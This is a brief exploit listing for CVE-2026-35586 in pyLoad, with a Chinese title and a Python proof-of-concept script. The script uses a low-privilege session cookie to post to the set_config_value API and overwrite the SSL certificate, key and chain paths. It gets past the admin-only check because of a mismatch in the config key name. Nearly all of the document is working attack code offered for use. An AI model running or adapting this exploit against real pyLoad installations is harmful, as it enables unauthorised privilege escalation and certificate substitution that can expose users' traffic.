CVE-2026-35586 pyLoad权限绕过漏洞

import requests # Exploit Title: pyLoad < 0.5.0b3.dev97 - SSL Configuration Privilege Escalation # Description: Bypass admin-only checks to overwrite SSL certificate paths. target_url = "http://127.0.0.1:8000/api/set_config_value" # Attacker's cookie (User with 'SETTINGS' permission, NOT 'ADMIN') attacker_cookie = { "pyload_session": "valid_low_privilege_session_token" } # The vulnerable payload. # The code checks for 'ssl_cert' in ADMIN_ONLY_CORE_OPTIONS, # but the actual config key is 'ssl_certfile', causing the check to fail. malicious_payload = { "ssl_certfile": "/path/to/malicious/cert.pem", "ssl_keyfile": "/path/to/malicious/key.pem", "ssl_certchain": "/path/to/malicious/chain.pem" } try: response = requests.post(target_url, json=malicious_payload, cookies=attacker_cookie) if response.status_code == 200: print("[+] Success: SSL configuration overwritten via privilege bypass.") print(f"[+] Response: {response.text}") else: print(f"[-] Failed: HTTP {response.status_code}") except Exception as e: print(f"[-] Error: {e}")